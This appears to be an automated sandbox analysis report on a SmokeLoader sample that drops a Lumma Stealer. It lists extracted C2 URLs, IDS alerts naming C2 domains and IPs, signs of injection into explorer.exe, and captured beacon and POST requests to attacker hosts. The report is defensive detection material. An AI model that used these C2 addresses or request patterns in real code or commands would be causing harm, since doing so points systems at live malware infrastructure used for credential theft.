Source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\46F6.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\ssegbth	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: oRKal761Qm.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ssegbth

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: oRKal761Qm.exe

Joe Sandbox ML: detected

Source: oRKal761Qm.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\oRKal761Qm.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.231:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.20:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.14.101:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.2

Source:	Binary string: BitLockerToGo.pdb source: 46F6.exe, 00000008.00000002.2924154344.000000C0011D8000.00000004.00001000.00020000.00000000.sdmp, 46F6.exe, 00000008.00000003.2899832791.000002526A7A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: E9D3.exe, 00000006.00000002.2651017840.00000255FBE92000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649527966.00000255FB493000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649355650.00000255FB29A000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653495704.00000255FD29E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652400588.00000255FCA9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653034314.00000255FD094000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649016504.00000255FB092000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651510234.00000255FC298000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651715162.00000255FC49C000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2664664295.00000255FDE96000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651321782.00000255FC093000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652741478.00000255FCE9F000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652576030.00000255FCC95000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653886409.00000255FD492000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654646644.00000255FD891000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652018283.00000255FC693000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654182300.00000255FD699000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657109705.00000255FDA90000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652227130.00000255FC897000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650850655.00000255FBC9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650285185.00000255FB69D000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650650030.00000255FBA91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650458140.00000255FB899000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2648400236.00000255FAE91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657663512.00000255FDC9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: E9D3.exe, 00000006.00000002.2651017840.00000255FBE92000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649527966.00000255FB493000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649355650.00000255FB29A000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653495704.00000255FD29E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652400588.00000255FCA9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653034314.00000255FD094000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649016504.00000255FB092000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651510234.00000255FC298000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651715162.00000255FC49C000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2664664295.00000255FDE96000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651321782.00000255FC093000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652741478.00000255FCE9F000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652576030.00000255FCC95000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653886409.00000255FD492000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654646644.00000255FD891000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652018283.00000255FC693000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654182300.00000255FD699000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657109705.00000255FDA90000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652227130.00000255FC897000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650850655.00000255FBC9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650285185.00000255FB69D000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650650030.00000255FBA91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650458140.00000255FB899000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2648400236.00000255FAE91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657663512.00000255FDC9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: 46F6.exe, 00000008.00000002.2924154344.000000C0011D8000.00000004.00001000.00020000.00000000.sdmp, 46F6.exe, 00000008.00000003.2899832791.000002526A7A0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\oRKal761Qm.exe

Code function: 0_2_00423920 GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,RtlTryEnterCriticalSection,WriteConsoleW,IntersectRect,DebugActiveProcessStop,GetAtomNameW,GlobalDeleteAtom,GetTimeZoneInformation,GetComputerNameW,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerW,CreateWaitableTimerW,FormatMessageW,GlobalAlloc,LoadLibraryA,

0_2_00423920

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], F25605F4h	9_2_00E5E372
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx]	9_2_00E2B5B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	9_2_00E5D7DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	9_2_00E3A0E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [edx+eax]	9_2_00E458D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	9_2_00E55060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-3C98071Eh]	9_2_00E3507B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_00E47840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], D07A397Fh	9_2_00E62000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00E49002
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-3C98071Eh]	9_2_00E3507B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_00E389F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	9_2_00E3E9C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00E38990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7416C6A7h]	9_2_00E462F1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+20h], 00000000h	9_2_00E2FA9F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, dword ptr [esp+6Ch]	9_2_00E46A7A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	9_2_00E23B80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+20h], 00000000h	9_2_00E32350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+20h], 00000000h	9_2_00E32B50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	9_2_00E5F330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edi]	9_2_00E5FB16
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	9_2_00E424AB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00E4BCB6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi+01h], 00000000h	9_2_00E32C26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], edx	9_2_00E5DC3B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	9_2_00E22DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 10DEF2FCh	9_2_00E5BDC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E812C154h	9_2_00E315DB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-74948882h]	9_2_00E37599
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edx], 00000000h	9_2_00E34578
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00E48550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	9_2_00E5A530
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [edi]	9_2_00E2C53A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00E46516
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+60h], 724B8471h	9_2_00E43ED2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-2839EA3Dh]	9_2_00E3FE80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+64363811h]	9_2_00E3FE80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	9_2_00E47E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, dword ptr [esp+38h]	9_2_00E47E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	9_2_00E30E42
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00E38E26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [edx]	9_2_00E29FB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea esi, dword ptr [edx+ecx]	9_2_00E43772
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-3783CB9Ch]	9_2_00E35F37

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 77.29.6.193:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2054958 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassizcellskz .shop) : 192.168.2.4:50771 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054962 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (writerospzm .shop) : 192.168.2.4:63947 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054954 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (languagedscie .shop) : 192.168.2.4:60199 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054956 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (mennyudosirso .shop) : 192.168.2.4:60883 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054952 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (complaintsipzzx .shop) : 192.168.2.4:63992 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054960 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deallerospfosu .shop) : 192.168.2.4:50040 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054959 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI) : 192.168.2.4:49764 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054964 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (celebratioopz .shop) : 192.168.2.4:64114 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2054953 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (complaintsipzzx .shop in TLS SNI) : 192.168.2.4:49769 -> 104.21.14.101:443
Source: Network traffic	Suricata IDS: 2054961 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (deallerospfosu .shop in TLS SNI) : 192.168.2.4:49766 -> 172.67.204.20:443
Source: Network traffic	Suricata IDS: 2054951 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (quialitsuzoxm .shop in TLS SNI) : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054959 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI) : 192.168.2.4:49767 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054963 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (writerospzm .shop in TLS SNI) : 192.168.2.4:49765 -> 172.67.166.231:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61795 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61796 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2054955 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (languagedscie .shop in TLS SNI) : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61797 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2054950 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (quialitsuzoxm .shop) : 192.168.2.4:64486 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61798 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 189.163.89.217:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61794 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49765 -> 172.67.166.231:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49765 -> 172.67.166.231:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 172.67.204.20:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49764 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 172.67.204.20:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49764 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49769 -> 104.21.14.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49769 -> 104.21.14.101:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49767 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 188.114.97.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 189.163.89.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 77.29.6.193 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor	URLs: http://olinsw.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 104.21.14.101 104.21.14.101
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic2.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic5.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: POST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: mundoparachicas.space
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bassizcellskz.shop
